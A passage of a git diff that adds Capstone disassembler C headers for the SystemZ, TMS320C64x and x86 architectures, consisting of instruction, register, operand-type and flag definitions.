SYSZ_INS_LGFI, + SYSZ_INS_LGFR, + SYSZ_INS_LGFRL, + SYSZ_INS_LGH, + SYSZ_INS_LGHI, + SYSZ_INS_LGHR, + SYSZ_INS_LGHRL, + SYSZ_INS_LGR, + SYSZ_INS_LGRL, + SYSZ_INS_LH, + SYSZ_INS_LHH, + SYSZ_INS_LHI, + SYSZ_INS_LHR, + SYSZ_INS_LHRL, + SYSZ_INS_LHY, + SYSZ_INS_LLC, + SYSZ_INS_LLCH, + SYSZ_INS_LLCR, + SYSZ_INS_LLGC, + SYSZ_INS_LLGCR, + SYSZ_INS_LLGF, + SYSZ_INS_LLGFR, + SYSZ_INS_LLGFRL, + SYSZ_INS_LLGH, + SYSZ_INS_LLGHR, + SYSZ_INS_LLGHRL, + SYSZ_INS_LLH, + SYSZ_INS_LLHH, + SYSZ_INS_LLHR, + SYSZ_INS_LLHRL, + SYSZ_INS_LLIHF, + SYSZ_INS_LLIHH, + SYSZ_INS_LLIHL, + SYSZ_INS_LLILF, + SYSZ_INS_LLILH, + SYSZ_INS_LLILL, + SYSZ_INS_LMG, + SYSZ_INS_LNDBR, + SYSZ_INS_LNEBR, + SYSZ_INS_LNGFR, + SYSZ_INS_LNGR, + SYSZ_INS_LNR, + SYSZ_INS_LNXBR, + SYSZ_INS_LPDBR, + SYSZ_INS_LPEBR, + SYSZ_INS_LPGFR, + SYSZ_INS_LPGR, + SYSZ_INS_LPR, + SYSZ_INS_LPXBR, + SYSZ_INS_LR, + SYSZ_INS_LRL, + SYSZ_INS_LRV, + SYSZ_INS_LRVG, + SYSZ_INS_LRVGR, + SYSZ_INS_LRVR, + SYSZ_INS_LT, + SYSZ_INS_LTDBR, + SYSZ_INS_LTEBR, + SYSZ_INS_LTG, + SYSZ_INS_LTGF, + SYSZ_INS_LTGFR, + SYSZ_INS_LTGR, + SYSZ_INS_LTR, + SYSZ_INS_LTXBR, + SYSZ_INS_LXDB, + SYSZ_INS_LXDBR, + SYSZ_INS_LXEB, + SYSZ_INS_LXEBR, + SYSZ_INS_LXR, + SYSZ_INS_LY, + SYSZ_INS_LZDR, + SYSZ_INS_LZER, + SYSZ_INS_LZXR, + SYSZ_INS_MADB, + SYSZ_INS_MADBR, + SYSZ_INS_MAEB, + SYSZ_INS_MAEBR, + SYSZ_INS_MDB, + SYSZ_INS_MDBR, + SYSZ_INS_MDEB, + SYSZ_INS_MDEBR, + SYSZ_INS_MEEB, + SYSZ_INS_MEEBR, + SYSZ_INS_MGHI, + SYSZ_INS_MH, + SYSZ_INS_MHI, + SYSZ_INS_MHY, + SYSZ_INS_MLG, + SYSZ_INS_MLGR, + SYSZ_INS_MS, + SYSZ_INS_MSDB, + SYSZ_INS_MSDBR, + SYSZ_INS_MSEB, + SYSZ_INS_MSEBR, + SYSZ_INS_MSFI, + SYSZ_INS_MSG, + SYSZ_INS_MSGF, + SYSZ_INS_MSGFI, + SYSZ_INS_MSGFR, + SYSZ_INS_MSGR, + SYSZ_INS_MSR, + SYSZ_INS_MSY, + SYSZ_INS_MVC, + SYSZ_INS_MVGHI, + SYSZ_INS_MVHHI, + SYSZ_INS_MVHI, + SYSZ_INS_MVI, + SYSZ_INS_MVIY, + SYSZ_INS_MVST, + SYSZ_INS_MXBR, + SYSZ_INS_MXDB, + SYSZ_INS_MXDBR, + SYSZ_INS_N, + SYSZ_INS_NC, + SYSZ_INS_NG, + SYSZ_INS_NGR, + SYSZ_INS_NGRK, + SYSZ_INS_NI, 
+ SYSZ_INS_NIHF, + SYSZ_INS_NIHH, + SYSZ_INS_NIHL, + SYSZ_INS_NILF, + SYSZ_INS_NILH, + SYSZ_INS_NILL, + SYSZ_INS_NIY, + SYSZ_INS_NR, + SYSZ_INS_NRK, + SYSZ_INS_NY, + SYSZ_INS_O, + SYSZ_INS_OC, + SYSZ_INS_OG, + SYSZ_INS_OGR, + SYSZ_INS_OGRK, + SYSZ_INS_OI, + SYSZ_INS_OIHF, + SYSZ_INS_OIHH, + SYSZ_INS_OIHL, + SYSZ_INS_OILF, + SYSZ_INS_OILH, + SYSZ_INS_OILL, + SYSZ_INS_OIY, + SYSZ_INS_OR, + SYSZ_INS_ORK, + SYSZ_INS_OY, + SYSZ_INS_PFD, + SYSZ_INS_PFDRL, + SYSZ_INS_RISBG, + SYSZ_INS_RISBHG, + SYSZ_INS_RISBLG, + SYSZ_INS_RLL, + SYSZ_INS_RLLG, + SYSZ_INS_RNSBG, + SYSZ_INS_ROSBG, + SYSZ_INS_RXSBG, + SYSZ_INS_S, + SYSZ_INS_SDB, + SYSZ_INS_SDBR, + SYSZ_INS_SEB, + SYSZ_INS_SEBR, + SYSZ_INS_SG, + SYSZ_INS_SGF, + SYSZ_INS_SGFR, + SYSZ_INS_SGR, + SYSZ_INS_SGRK, + SYSZ_INS_SH, + SYSZ_INS_SHY, + SYSZ_INS_SL, + SYSZ_INS_SLB, + SYSZ_INS_SLBG, + SYSZ_INS_SLBR, + SYSZ_INS_SLFI, + SYSZ_INS_SLG, + SYSZ_INS_SLBGR, + SYSZ_INS_SLGF, + SYSZ_INS_SLGFI, + SYSZ_INS_SLGFR, + SYSZ_INS_SLGR, + SYSZ_INS_SLGRK, + SYSZ_INS_SLL, + SYSZ_INS_SLLG, + SYSZ_INS_SLLK, + SYSZ_INS_SLR, + SYSZ_INS_SLRK, + SYSZ_INS_SLY, + SYSZ_INS_SQDB, + SYSZ_INS_SQDBR, + SYSZ_INS_SQEB, + SYSZ_INS_SQEBR, + SYSZ_INS_SQXBR, + SYSZ_INS_SR, + SYSZ_INS_SRA, + SYSZ_INS_SRAG, + SYSZ_INS_SRAK, + SYSZ_INS_SRK, + SYSZ_INS_SRL, + SYSZ_INS_SRLG, + SYSZ_INS_SRLK, + SYSZ_INS_SRST, + SYSZ_INS_ST, + SYSZ_INS_STC, + SYSZ_INS_STCH, + SYSZ_INS_STCY, + SYSZ_INS_STD, + SYSZ_INS_STDY, + SYSZ_INS_STE, + SYSZ_INS_STEY, + SYSZ_INS_STFH, + SYSZ_INS_STG, + SYSZ_INS_STGRL, + SYSZ_INS_STH, + SYSZ_INS_STHH, + SYSZ_INS_STHRL, + SYSZ_INS_STHY, + SYSZ_INS_STMG, + SYSZ_INS_STRL, + SYSZ_INS_STRV, + SYSZ_INS_STRVG, + SYSZ_INS_STY, + SYSZ_INS_SXBR, + SYSZ_INS_SY, + SYSZ_INS_TM, + SYSZ_INS_TMHH, + SYSZ_INS_TMHL, + SYSZ_INS_TMLH, + SYSZ_INS_TMLL, + SYSZ_INS_TMY, + SYSZ_INS_X, + SYSZ_INS_XC, + SYSZ_INS_XG, + SYSZ_INS_XGR, + SYSZ_INS_XGRK, + SYSZ_INS_XI, + SYSZ_INS_XIHF, + SYSZ_INS_XILF, + SYSZ_INS_XIY, + SYSZ_INS_XR, + SYSZ_INS_XRK, + SYSZ_INS_XY, + + 
SYSZ_INS_ENDING, // <-- mark the end of the list of instructions +} sysz_insn; + +/// Group of SystemZ instructions +typedef enum sysz_insn_group { + SYSZ_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + SYSZ_GRP_JUMP, ///< = CS_GRP_JUMP + + // Architecture-specific groups + SYSZ_GRP_DISTINCTOPS = 128, + SYSZ_GRP_FPEXTENSION, + SYSZ_GRP_HIGHWORD, + SYSZ_GRP_INTERLOCKEDACCESS1, + SYSZ_GRP_LOADSTOREONCOND, + + SYSZ_GRP_ENDING, // <-- mark the end of the list of groups +} sysz_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/tms320c64x.h b/ai_anti_malware/capstone/include/capstone/tms320c64x.h new file mode 100644 index 0000000..5e7f1b3 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/tms320c64x.h @@ -0,0 +1,359 @@ +/* Capstone Disassembly Engine */ +/* TMS320C64x Backend by Fotis Loukos 2016 */ + +#ifndef CAPSTONE_TMS320C64X_H +#define CAPSTONE_TMS320C64X_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +typedef enum tms320c64x_op_type { + TMS320C64X_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + TMS320C64X_OP_REG, ///< = CS_OP_REG (Register operand). + TMS320C64X_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + TMS320C64X_OP_MEM, ///< = CS_OP_MEM (Memory operand). 
+ TMS320C64X_OP_REGPAIR = 64, ///< Register pair for double word ops +} tms320c64x_op_type; + +typedef enum tms320c64x_mem_disp { + TMS320C64X_MEM_DISP_INVALID = 0, + TMS320C64X_MEM_DISP_CONSTANT, + TMS320C64X_MEM_DISP_REGISTER, +} tms320c64x_mem_disp; + +typedef enum tms320c64x_mem_dir { + TMS320C64X_MEM_DIR_INVALID = 0, + TMS320C64X_MEM_DIR_FW, + TMS320C64X_MEM_DIR_BW, +} tms320c64x_mem_dir; + +typedef enum tms320c64x_mem_mod { + TMS320C64X_MEM_MOD_INVALID = 0, + TMS320C64X_MEM_MOD_NO, + TMS320C64X_MEM_MOD_PRE, + TMS320C64X_MEM_MOD_POST, +} tms320c64x_mem_mod; + +typedef struct tms320c64x_op_mem { + unsigned int base; ///< base register + unsigned int disp; ///< displacement/offset value + unsigned int unit; ///< unit of base and offset register + unsigned int scaled; ///< offset scaled + unsigned int disptype; ///< displacement type + unsigned int direction; ///< direction + unsigned int modify; ///< modification +} tms320c64x_op_mem; + +typedef struct cs_tms320c64x_op { + tms320c64x_op_type type; ///< operand type + union { + unsigned int reg; ///< register value for REG operand or first register for REGPAIR operand + int32_t imm; ///< immediate value for IMM operand + tms320c64x_op_mem mem; ///< base/disp value for MEM operand + }; +} cs_tms320c64x_op; + +typedef struct cs_tms320c64x { + uint8_t op_count; + cs_tms320c64x_op operands[8]; ///< operands for this instruction. 
+ struct { + unsigned int reg; + unsigned int zero; + } condition; + struct { + unsigned int unit; + unsigned int side; + unsigned int crosspath; + } funit; + unsigned int parallel; +} cs_tms320c64x; + +typedef enum tms320c64x_reg { + TMS320C64X_REG_INVALID = 0, + + TMS320C64X_REG_AMR, + TMS320C64X_REG_CSR, + TMS320C64X_REG_DIER, + TMS320C64X_REG_DNUM, + TMS320C64X_REG_ECR, + TMS320C64X_REG_GFPGFR, + TMS320C64X_REG_GPLYA, + TMS320C64X_REG_GPLYB, + TMS320C64X_REG_ICR, + TMS320C64X_REG_IER, + TMS320C64X_REG_IERR, + TMS320C64X_REG_ILC, + TMS320C64X_REG_IRP, + TMS320C64X_REG_ISR, + TMS320C64X_REG_ISTP, + TMS320C64X_REG_ITSR, + TMS320C64X_REG_NRP, + TMS320C64X_REG_NTSR, + TMS320C64X_REG_REP, + TMS320C64X_REG_RILC, + TMS320C64X_REG_SSR, + TMS320C64X_REG_TSCH, + TMS320C64X_REG_TSCL, + TMS320C64X_REG_TSR, + TMS320C64X_REG_A0, + TMS320C64X_REG_A1, + TMS320C64X_REG_A2, + TMS320C64X_REG_A3, + TMS320C64X_REG_A4, + TMS320C64X_REG_A5, + TMS320C64X_REG_A6, + TMS320C64X_REG_A7, + TMS320C64X_REG_A8, + TMS320C64X_REG_A9, + TMS320C64X_REG_A10, + TMS320C64X_REG_A11, + TMS320C64X_REG_A12, + TMS320C64X_REG_A13, + TMS320C64X_REG_A14, + TMS320C64X_REG_A15, + TMS320C64X_REG_A16, + TMS320C64X_REG_A17, + TMS320C64X_REG_A18, + TMS320C64X_REG_A19, + TMS320C64X_REG_A20, + TMS320C64X_REG_A21, + TMS320C64X_REG_A22, + TMS320C64X_REG_A23, + TMS320C64X_REG_A24, + TMS320C64X_REG_A25, + TMS320C64X_REG_A26, + TMS320C64X_REG_A27, + TMS320C64X_REG_A28, + TMS320C64X_REG_A29, + TMS320C64X_REG_A30, + TMS320C64X_REG_A31, + TMS320C64X_REG_B0, + TMS320C64X_REG_B1, + TMS320C64X_REG_B2, + TMS320C64X_REG_B3, + TMS320C64X_REG_B4, + TMS320C64X_REG_B5, + TMS320C64X_REG_B6, + TMS320C64X_REG_B7, + TMS320C64X_REG_B8, + TMS320C64X_REG_B9, + TMS320C64X_REG_B10, + TMS320C64X_REG_B11, + TMS320C64X_REG_B12, + TMS320C64X_REG_B13, + TMS320C64X_REG_B14, + TMS320C64X_REG_B15, + TMS320C64X_REG_B16, + TMS320C64X_REG_B17, + TMS320C64X_REG_B18, + TMS320C64X_REG_B19, + TMS320C64X_REG_B20, + TMS320C64X_REG_B21, + TMS320C64X_REG_B22, 
+ TMS320C64X_REG_B23, + TMS320C64X_REG_B24, + TMS320C64X_REG_B25, + TMS320C64X_REG_B26, + TMS320C64X_REG_B27, + TMS320C64X_REG_B28, + TMS320C64X_REG_B29, + TMS320C64X_REG_B30, + TMS320C64X_REG_B31, + TMS320C64X_REG_PCE1, + + TMS320C64X_REG_ENDING, // <-- mark the end of the list of registers + + // Alias registers + TMS320C64X_REG_EFR = TMS320C64X_REG_ECR, + TMS320C64X_REG_IFR = TMS320C64X_REG_ISR, +} tms320c64x_reg; + +typedef enum tms320c64x_insn { + TMS320C64X_INS_INVALID = 0, + + TMS320C64X_INS_ABS, + TMS320C64X_INS_ABS2, + TMS320C64X_INS_ADD, + TMS320C64X_INS_ADD2, + TMS320C64X_INS_ADD4, + TMS320C64X_INS_ADDAB, + TMS320C64X_INS_ADDAD, + TMS320C64X_INS_ADDAH, + TMS320C64X_INS_ADDAW, + TMS320C64X_INS_ADDK, + TMS320C64X_INS_ADDKPC, + TMS320C64X_INS_ADDU, + TMS320C64X_INS_AND, + TMS320C64X_INS_ANDN, + TMS320C64X_INS_AVG2, + TMS320C64X_INS_AVGU4, + TMS320C64X_INS_B, + TMS320C64X_INS_BDEC, + TMS320C64X_INS_BITC4, + TMS320C64X_INS_BNOP, + TMS320C64X_INS_BPOS, + TMS320C64X_INS_CLR, + TMS320C64X_INS_CMPEQ, + TMS320C64X_INS_CMPEQ2, + TMS320C64X_INS_CMPEQ4, + TMS320C64X_INS_CMPGT, + TMS320C64X_INS_CMPGT2, + TMS320C64X_INS_CMPGTU4, + TMS320C64X_INS_CMPLT, + TMS320C64X_INS_CMPLTU, + TMS320C64X_INS_DEAL, + TMS320C64X_INS_DOTP2, + TMS320C64X_INS_DOTPN2, + TMS320C64X_INS_DOTPNRSU2, + TMS320C64X_INS_DOTPRSU2, + TMS320C64X_INS_DOTPSU4, + TMS320C64X_INS_DOTPU4, + TMS320C64X_INS_EXT, + TMS320C64X_INS_EXTU, + TMS320C64X_INS_GMPGTU, + TMS320C64X_INS_GMPY4, + TMS320C64X_INS_LDB, + TMS320C64X_INS_LDBU, + TMS320C64X_INS_LDDW, + TMS320C64X_INS_LDH, + TMS320C64X_INS_LDHU, + TMS320C64X_INS_LDNDW, + TMS320C64X_INS_LDNW, + TMS320C64X_INS_LDW, + TMS320C64X_INS_LMBD, + TMS320C64X_INS_MAX2, + TMS320C64X_INS_MAXU4, + TMS320C64X_INS_MIN2, + TMS320C64X_INS_MINU4, + TMS320C64X_INS_MPY, + TMS320C64X_INS_MPY2, + TMS320C64X_INS_MPYH, + TMS320C64X_INS_MPYHI, + TMS320C64X_INS_MPYHIR, + TMS320C64X_INS_MPYHL, + TMS320C64X_INS_MPYHLU, + TMS320C64X_INS_MPYHSLU, + TMS320C64X_INS_MPYHSU, + 
TMS320C64X_INS_MPYHU, + TMS320C64X_INS_MPYHULS, + TMS320C64X_INS_MPYHUS, + TMS320C64X_INS_MPYLH, + TMS320C64X_INS_MPYLHU, + TMS320C64X_INS_MPYLI, + TMS320C64X_INS_MPYLIR, + TMS320C64X_INS_MPYLSHU, + TMS320C64X_INS_MPYLUHS, + TMS320C64X_INS_MPYSU, + TMS320C64X_INS_MPYSU4, + TMS320C64X_INS_MPYU, + TMS320C64X_INS_MPYU4, + TMS320C64X_INS_MPYUS, + TMS320C64X_INS_MVC, + TMS320C64X_INS_MVD, + TMS320C64X_INS_MVK, + TMS320C64X_INS_MVKL, + TMS320C64X_INS_MVKLH, + TMS320C64X_INS_NOP, + TMS320C64X_INS_NORM, + TMS320C64X_INS_OR, + TMS320C64X_INS_PACK2, + TMS320C64X_INS_PACKH2, + TMS320C64X_INS_PACKH4, + TMS320C64X_INS_PACKHL2, + TMS320C64X_INS_PACKL4, + TMS320C64X_INS_PACKLH2, + TMS320C64X_INS_ROTL, + TMS320C64X_INS_SADD, + TMS320C64X_INS_SADD2, + TMS320C64X_INS_SADDU4, + TMS320C64X_INS_SADDUS2, + TMS320C64X_INS_SAT, + TMS320C64X_INS_SET, + TMS320C64X_INS_SHFL, + TMS320C64X_INS_SHL, + TMS320C64X_INS_SHLMB, + TMS320C64X_INS_SHR, + TMS320C64X_INS_SHR2, + TMS320C64X_INS_SHRMB, + TMS320C64X_INS_SHRU, + TMS320C64X_INS_SHRU2, + TMS320C64X_INS_SMPY, + TMS320C64X_INS_SMPY2, + TMS320C64X_INS_SMPYH, + TMS320C64X_INS_SMPYHL, + TMS320C64X_INS_SMPYLH, + TMS320C64X_INS_SPACK2, + TMS320C64X_INS_SPACKU4, + TMS320C64X_INS_SSHL, + TMS320C64X_INS_SSHVL, + TMS320C64X_INS_SSHVR, + TMS320C64X_INS_SSUB, + TMS320C64X_INS_STB, + TMS320C64X_INS_STDW, + TMS320C64X_INS_STH, + TMS320C64X_INS_STNDW, + TMS320C64X_INS_STNW, + TMS320C64X_INS_STW, + TMS320C64X_INS_SUB, + TMS320C64X_INS_SUB2, + TMS320C64X_INS_SUB4, + TMS320C64X_INS_SUBAB, + TMS320C64X_INS_SUBABS4, + TMS320C64X_INS_SUBAH, + TMS320C64X_INS_SUBAW, + TMS320C64X_INS_SUBC, + TMS320C64X_INS_SUBU, + TMS320C64X_INS_SWAP4, + TMS320C64X_INS_UNPKHU4, + TMS320C64X_INS_UNPKLU4, + TMS320C64X_INS_XOR, + TMS320C64X_INS_XPND2, + TMS320C64X_INS_XPND4, + // Aliases + TMS320C64X_INS_IDLE, + TMS320C64X_INS_MV, + TMS320C64X_INS_NEG, + TMS320C64X_INS_NOT, + TMS320C64X_INS_SWAP2, + TMS320C64X_INS_ZERO, + + TMS320C64X_INS_ENDING, // <-- mark the end of the list of 
instructions +} tms320c64x_insn; + +typedef enum tms320c64x_insn_group { + TMS320C64X_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + TMS320C64X_GRP_JUMP, ///< = CS_GRP_JUMP + + TMS320C64X_GRP_FUNIT_D = 128, + TMS320C64X_GRP_FUNIT_L, + TMS320C64X_GRP_FUNIT_M, + TMS320C64X_GRP_FUNIT_S, + TMS320C64X_GRP_FUNIT_NO, + + TMS320C64X_GRP_ENDING, // <-- mark the end of the list of groups +} tms320c64x_insn_group; + +typedef enum tms320c64x_funit { + TMS320C64X_FUNIT_INVALID = 0, + TMS320C64X_FUNIT_D, + TMS320C64X_FUNIT_L, + TMS320C64X_FUNIT_M, + TMS320C64X_FUNIT_S, + TMS320C64X_FUNIT_NO +} tms320c64x_funit; + +#ifdef __cplusplus +} +#endif + +#endif + diff --git a/ai_anti_malware/capstone/include/capstone/x86.h b/ai_anti_malware/capstone/include/capstone/x86.h new file mode 100644 index 0000000..f8fc09e --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/x86.h @@ -0,0 +1,1972 @@ +#ifndef CAPSTONE_X86_H +#define CAPSTONE_X86_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +/// Calculate relative address for X86-64, given cs_insn structure +#define X86_REL_ADDR(insn) (((insn).detail->x86.operands[0].type == X86_OP_IMM) \ + ? 
(uint64_t)((insn).detail->x86.operands[0].imm) \ + : (((insn).address + (insn).size) + (uint64_t)(insn).detail->x86.disp)) + +/// X86 registers +typedef enum x86_reg { + X86_REG_INVALID = 0, + X86_REG_AH, X86_REG_AL, X86_REG_AX, X86_REG_BH, X86_REG_BL, + X86_REG_BP, X86_REG_BPL, X86_REG_BX, X86_REG_CH, X86_REG_CL, + X86_REG_CS, X86_REG_CX, X86_REG_DH, X86_REG_DI, X86_REG_DIL, + X86_REG_DL, X86_REG_DS, X86_REG_DX, X86_REG_EAX, X86_REG_EBP, + X86_REG_EBX, X86_REG_ECX, X86_REG_EDI, X86_REG_EDX, X86_REG_EFLAGS, + X86_REG_EIP, X86_REG_EIZ, X86_REG_ES, X86_REG_ESI, X86_REG_ESP, + X86_REG_FPSW, X86_REG_FS, X86_REG_GS, X86_REG_IP, X86_REG_RAX, + X86_REG_RBP, X86_REG_RBX, X86_REG_RCX, X86_REG_RDI, X86_REG_RDX, + X86_REG_RIP, X86_REG_RIZ, X86_REG_RSI, X86_REG_RSP, X86_REG_SI, + X86_REG_SIL, X86_REG_SP, X86_REG_SPL, X86_REG_SS, X86_REG_CR0, + X86_REG_CR1, X86_REG_CR2, X86_REG_CR3, X86_REG_CR4, X86_REG_CR5, + X86_REG_CR6, X86_REG_CR7, X86_REG_CR8, X86_REG_CR9, X86_REG_CR10, + X86_REG_CR11, X86_REG_CR12, X86_REG_CR13, X86_REG_CR14, X86_REG_CR15, + X86_REG_DR0, X86_REG_DR1, X86_REG_DR2, X86_REG_DR3, X86_REG_DR4, + X86_REG_DR5, X86_REG_DR6, X86_REG_DR7, X86_REG_DR8, X86_REG_DR9, + X86_REG_DR10, X86_REG_DR11, X86_REG_DR12, X86_REG_DR13, X86_REG_DR14, + X86_REG_DR15, X86_REG_FP0, X86_REG_FP1, X86_REG_FP2, X86_REG_FP3, + X86_REG_FP4, X86_REG_FP5, X86_REG_FP6, X86_REG_FP7, + X86_REG_K0, X86_REG_K1, X86_REG_K2, X86_REG_K3, X86_REG_K4, + X86_REG_K5, X86_REG_K6, X86_REG_K7, X86_REG_MM0, X86_REG_MM1, + X86_REG_MM2, X86_REG_MM3, X86_REG_MM4, X86_REG_MM5, X86_REG_MM6, + X86_REG_MM7, X86_REG_R8, X86_REG_R9, X86_REG_R10, X86_REG_R11, + X86_REG_R12, X86_REG_R13, X86_REG_R14, X86_REG_R15, + X86_REG_ST0, X86_REG_ST1, X86_REG_ST2, X86_REG_ST3, + X86_REG_ST4, X86_REG_ST5, X86_REG_ST6, X86_REG_ST7, + X86_REG_XMM0, X86_REG_XMM1, X86_REG_XMM2, X86_REG_XMM3, X86_REG_XMM4, + X86_REG_XMM5, X86_REG_XMM6, X86_REG_XMM7, X86_REG_XMM8, X86_REG_XMM9, + X86_REG_XMM10, X86_REG_XMM11, X86_REG_XMM12, 
X86_REG_XMM13, X86_REG_XMM14, + X86_REG_XMM15, X86_REG_XMM16, X86_REG_XMM17, X86_REG_XMM18, X86_REG_XMM19, + X86_REG_XMM20, X86_REG_XMM21, X86_REG_XMM22, X86_REG_XMM23, X86_REG_XMM24, + X86_REG_XMM25, X86_REG_XMM26, X86_REG_XMM27, X86_REG_XMM28, X86_REG_XMM29, + X86_REG_XMM30, X86_REG_XMM31, X86_REG_YMM0, X86_REG_YMM1, X86_REG_YMM2, + X86_REG_YMM3, X86_REG_YMM4, X86_REG_YMM5, X86_REG_YMM6, X86_REG_YMM7, + X86_REG_YMM8, X86_REG_YMM9, X86_REG_YMM10, X86_REG_YMM11, X86_REG_YMM12, + X86_REG_YMM13, X86_REG_YMM14, X86_REG_YMM15, X86_REG_YMM16, X86_REG_YMM17, + X86_REG_YMM18, X86_REG_YMM19, X86_REG_YMM20, X86_REG_YMM21, X86_REG_YMM22, + X86_REG_YMM23, X86_REG_YMM24, X86_REG_YMM25, X86_REG_YMM26, X86_REG_YMM27, + X86_REG_YMM28, X86_REG_YMM29, X86_REG_YMM30, X86_REG_YMM31, X86_REG_ZMM0, + X86_REG_ZMM1, X86_REG_ZMM2, X86_REG_ZMM3, X86_REG_ZMM4, X86_REG_ZMM5, + X86_REG_ZMM6, X86_REG_ZMM7, X86_REG_ZMM8, X86_REG_ZMM9, X86_REG_ZMM10, + X86_REG_ZMM11, X86_REG_ZMM12, X86_REG_ZMM13, X86_REG_ZMM14, X86_REG_ZMM15, + X86_REG_ZMM16, X86_REG_ZMM17, X86_REG_ZMM18, X86_REG_ZMM19, X86_REG_ZMM20, + X86_REG_ZMM21, X86_REG_ZMM22, X86_REG_ZMM23, X86_REG_ZMM24, X86_REG_ZMM25, + X86_REG_ZMM26, X86_REG_ZMM27, X86_REG_ZMM28, X86_REG_ZMM29, X86_REG_ZMM30, + X86_REG_ZMM31, X86_REG_R8B, X86_REG_R9B, X86_REG_R10B, X86_REG_R11B, + X86_REG_R12B, X86_REG_R13B, X86_REG_R14B, X86_REG_R15B, X86_REG_R8D, + X86_REG_R9D, X86_REG_R10D, X86_REG_R11D, X86_REG_R12D, X86_REG_R13D, + X86_REG_R14D, X86_REG_R15D, X86_REG_R8W, X86_REG_R9W, X86_REG_R10W, + X86_REG_R11W, X86_REG_R12W, X86_REG_R13W, X86_REG_R14W, X86_REG_R15W, + + X86_REG_ENDING // <-- mark the end of the list of registers +} x86_reg; + +// Sub-flags of EFLAGS +#define X86_EFLAGS_MODIFY_AF (1ULL << 0) +#define X86_EFLAGS_MODIFY_CF (1ULL << 1) +#define X86_EFLAGS_MODIFY_SF (1ULL << 2) +#define X86_EFLAGS_MODIFY_ZF (1ULL << 3) +#define X86_EFLAGS_MODIFY_PF (1ULL << 4) +#define X86_EFLAGS_MODIFY_OF (1ULL << 5) +#define X86_EFLAGS_MODIFY_TF (1ULL << 6) 
+#define X86_EFLAGS_MODIFY_IF (1ULL << 7) +#define X86_EFLAGS_MODIFY_DF (1ULL << 8) +#define X86_EFLAGS_MODIFY_NT (1ULL << 9) +#define X86_EFLAGS_MODIFY_RF (1ULL << 10) +#define X86_EFLAGS_PRIOR_OF (1ULL << 11) +#define X86_EFLAGS_PRIOR_SF (1ULL << 12) +#define X86_EFLAGS_PRIOR_ZF (1ULL << 13) +#define X86_EFLAGS_PRIOR_AF (1ULL << 14) +#define X86_EFLAGS_PRIOR_PF (1ULL << 15) +#define X86_EFLAGS_PRIOR_CF (1ULL << 16) +#define X86_EFLAGS_PRIOR_TF (1ULL << 17) +#define X86_EFLAGS_PRIOR_IF (1ULL << 18) +#define X86_EFLAGS_PRIOR_DF (1ULL << 19) +#define X86_EFLAGS_PRIOR_NT (1ULL << 20) +#define X86_EFLAGS_RESET_OF (1ULL << 21) +#define X86_EFLAGS_RESET_CF (1ULL << 22) +#define X86_EFLAGS_RESET_DF (1ULL << 23) +#define X86_EFLAGS_RESET_IF (1ULL << 24) +#define X86_EFLAGS_RESET_SF (1ULL << 25) +#define X86_EFLAGS_RESET_AF (1ULL << 26) +#define X86_EFLAGS_RESET_TF (1ULL << 27) +#define X86_EFLAGS_RESET_NT (1ULL << 28) +#define X86_EFLAGS_RESET_PF (1ULL << 29) +#define X86_EFLAGS_SET_CF (1ULL << 30) +#define X86_EFLAGS_SET_DF (1ULL << 31) +#define X86_EFLAGS_SET_IF (1ULL << 32) +#define X86_EFLAGS_TEST_OF (1ULL << 33) +#define X86_EFLAGS_TEST_SF (1ULL << 34) +#define X86_EFLAGS_TEST_ZF (1ULL << 35) +#define X86_EFLAGS_TEST_PF (1ULL << 36) +#define X86_EFLAGS_TEST_CF (1ULL << 37) +#define X86_EFLAGS_TEST_NT (1ULL << 38) +#define X86_EFLAGS_TEST_DF (1ULL << 39) +#define X86_EFLAGS_UNDEFINED_OF (1ULL << 40) +#define X86_EFLAGS_UNDEFINED_SF (1ULL << 41) +#define X86_EFLAGS_UNDEFINED_ZF (1ULL << 42) +#define X86_EFLAGS_UNDEFINED_PF (1ULL << 43) +#define X86_EFLAGS_UNDEFINED_AF (1ULL << 44) +#define X86_EFLAGS_UNDEFINED_CF (1ULL << 45) +#define X86_EFLAGS_RESET_RF (1ULL << 46) +#define X86_EFLAGS_TEST_RF (1ULL << 47) +#define X86_EFLAGS_TEST_IF (1ULL << 48) +#define X86_EFLAGS_TEST_TF (1ULL << 49) +#define X86_EFLAGS_TEST_AF (1ULL << 50) +#define X86_EFLAGS_RESET_ZF (1ULL << 51) +#define X86_EFLAGS_SET_OF (1ULL << 52) +#define X86_EFLAGS_SET_SF (1ULL << 53) +#define 
X86_EFLAGS_SET_ZF (1ULL << 54) +#define X86_EFLAGS_SET_AF (1ULL << 55) +#define X86_EFLAGS_SET_PF (1ULL << 56) +#define X86_EFLAGS_RESET_0F (1ULL << 57) +#define X86_EFLAGS_RESET_AC (1ULL << 58) + +#define X86_FPU_FLAGS_MODIFY_C0 (1ULL << 0) +#define X86_FPU_FLAGS_MODIFY_C1 (1ULL << 1) +#define X86_FPU_FLAGS_MODIFY_C2 (1ULL << 2) +#define X86_FPU_FLAGS_MODIFY_C3 (1ULL << 3) +#define X86_FPU_FLAGS_RESET_C0 (1ULL << 4) +#define X86_FPU_FLAGS_RESET_C1 (1ULL << 5) +#define X86_FPU_FLAGS_RESET_C2 (1ULL << 6) +#define X86_FPU_FLAGS_RESET_C3 (1ULL << 7) +#define X86_FPU_FLAGS_SET_C0 (1ULL << 8) +#define X86_FPU_FLAGS_SET_C1 (1ULL << 9) +#define X86_FPU_FLAGS_SET_C2 (1ULL << 10) +#define X86_FPU_FLAGS_SET_C3 (1ULL << 11) +#define X86_FPU_FLAGS_UNDEFINED_C0 (1ULL << 12) +#define X86_FPU_FLAGS_UNDEFINED_C1 (1ULL << 13) +#define X86_FPU_FLAGS_UNDEFINED_C2 (1ULL << 14) +#define X86_FPU_FLAGS_UNDEFINED_C3 (1ULL << 15) +#define X86_FPU_FLAGS_TEST_C0 (1ULL << 16) +#define X86_FPU_FLAGS_TEST_C1 (1ULL << 17) +#define 